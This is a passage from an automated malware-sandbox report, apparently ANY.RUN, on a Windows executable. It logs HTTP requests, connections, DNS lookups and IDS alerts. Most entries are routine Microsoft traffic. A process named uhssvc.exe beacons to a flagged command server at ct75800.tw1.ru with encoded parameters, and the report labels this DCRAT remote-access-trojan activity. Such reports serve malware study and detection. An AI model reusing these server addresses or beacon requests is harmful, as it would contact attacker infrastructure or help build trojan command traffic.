http://ct75800.tw1.ru/24e1bab6.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&656d491dcc64a87307ba6e7997d61748=gNihzY4QzYllDZzQGMkdDNxQjY5UDNyAjM1AzM0UGM0kDN3QTNjBDMxQjN4gTM2MTMzgjMxATO&5a2622b8407fb4244232432693edbdf4=QY4gjZ0QmNxgTYzAzN4U2YwYjYidzM4YWYjJDNwcDZwMWNykjN3ImM&3e8e7b78ec641ef2ab674c157cb4ab27=d1nIyATOmZzY4ADOyIjNhVzM2MTNjZDMykDO1ImNmNGZlFDM3EGN5kTOzIiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W&5869f62f557e5e1f43a94f0b20213fdf=QX9JiI6ICZhRGM1YWZ0IWYyUzYwYmNhNTZwYmNjlTY2czMldTY4ICLiIDM5YmNjhDM4IjM2EWNzYzM1MmNwITO4UjY2Y2YkVWMwcTY0kTO5MjI6IiZwUjNiljZ2EWMkljYjFjMhRDOwMmMyUjNlhzMiNzNwICLigTZiBDMxM2YmhDNiNmNyUjZyMGZ1ATO3QDN1UzM1YDZkBjMlFzNiRmI6ISOklTOwEWY2kjM4IWOxUjNldDZ3MTNzYzM0YjM5kDO0Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTU9kMZpGT0cXaNJTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXS51EM0M1TwkkaMNTRq1UdFR1Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQWYkBTNmVGNiFmM1MGMmZTYzUGMmZzY5EmN3MTZ3EGOiwiI5MzMzUzNzE2MwY2Y5UmZmlDM4MTMhRDM4EGZzMjZ3YDM0czNlRTMhJiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W
unknown
whitelisted
856
uhssvc.exe
GET
200
188.225.23.151:80
http://ct75800.tw1.ru/24e1bab6.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&656d491dcc64a87307ba6e7997d61748=gNihzY4QzYllDZzQGMkdDNxQjY5UDNyAjM1AzM0UGM0kDN3QTNjBDMxQjN4gTM2MTMzgjMxATO&5a2622b8407fb4244232432693edbdf4=QY4gjZ0QmNxgTYzAzN4U2YwYjYidzM4YWYjJDNwcDZwMWNykjN3ImM&3e8e7b78ec641ef2ab674c157cb4ab27=d1nIyATOmZzY4ADOyIjNhVzM2MTNjZDMykDO1ImNmNGZlFDM3EGN5kTOzIiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W&5869f62f557e5e1f43a94f0b20213fdf=QX9JiI6ICZhRGM1YWZ0IWYyUzYwYmNhNTZwYmNjlTY2czMldTY4ICLiIDM5YmNjhDM4IjM2EWNzYzM1MmNwITO4UjY2Y2YkVWMwcTY0kTO5MjI6IiZwUjNiljZ2EWMkljYjFjMhRDOwMmMyUjNlhzMiNzNwICLigTZiBDMxM2YmhDNiNmNyUjZyMGZ1ATO3QDN1UzM1YDZkBjMlFzNiRmI6ISOklTOwEWY2kjM4IWOxUjNldDZ3MTNzYzM0YjM5kDO0Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTU9kMZpGT0cXaNJTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXS51EM0M1TwkkaMNTRq1UdFR1Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQWYkBTNmVGNiFmM1MGMmZTYzUGMmZzY5EmN3MTZ3EGOiwiI5MzMzUzNzE2MwY2Y5UmZmlDM4MTMhRDM4EGZzMjZ3YDM0czNlRTMhJiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W
unknown
whitelisted
1268
svchost.exe
GET
200
2.16.168.124:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2288
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
856
uhssvc.exe
GET
200
188.225.23.151:80
http://ct75800.tw1.ru/24e1bab6.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&656d491dcc64a87307ba6e7997d61748=gNihzY4QzYllDZzQGMkdDNxQjY5UDNyAjM1AzM0UGM0kDN3QTNjBDMxQjN4gTM2MTMzgjMxATO&5a2622b8407fb4244232432693edbdf4=QY4gjZ0QmNxgTYzAzN4U2YwYjYidzM4YWYjJDNwcDZwMWNykjN3ImM&617a503302af68105dc00c0ead8661bd=0VfiElZp10VhpnVYR1Y4ZEZzZFWZ1mVHJ1Y4FzY5ZlMjZFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJZHbHpVMGVUSzsmeKRkRFlkcWdEZzZ0VaNlQTxUenNUS1xWRJxWNXFWT1cEW5hnVkJkQ55UNjlXUCJUehxmUIJGaW1WVnBTaN9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQWYkBTNmVGNiFmM1MGMmZTYzUGMmZzY5EmN3MTZ3EGOiwiIiRTYjN2NiNDO5cDO5gTZ3gTY2YmYhZWNzEGOjFmY3ATOjdjYyETYiJiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7132
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
2.16.168.124:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
856
uhssvc.exe
188.225.23.151:80
ct75800.tw1.ru
TimeWeb Ltd.
RU
malicious
1268
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 172.217.18.14
whitelisted
crl.microsoft.com
  • 2.16.168.124
  • 2.16.168.114
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.35.229.160
whitelisted
ct75800.tw1.ru
  • 188.225.23.151
malicious
login.live.com
  • 20.190.159.2
  • 40.126.31.130
  • 40.126.31.3
  • 20.190.159.130
  • 40.126.31.131
  • 20.190.159.75
  • 20.190.159.23
  • 40.126.31.129
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
nexusrules.officeapps.live.com
  • 52.111.243.30
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

PID
Process
Class
Message
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2200
svchost.exe
A Network Trojan was detected
MALWARE [ANY.RUN] Suspected domain Associated with Malware Distribution (.tw1 .ru)
856
uhssvc.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
63cfc67e3f30eef4f069d4c50afec506.exe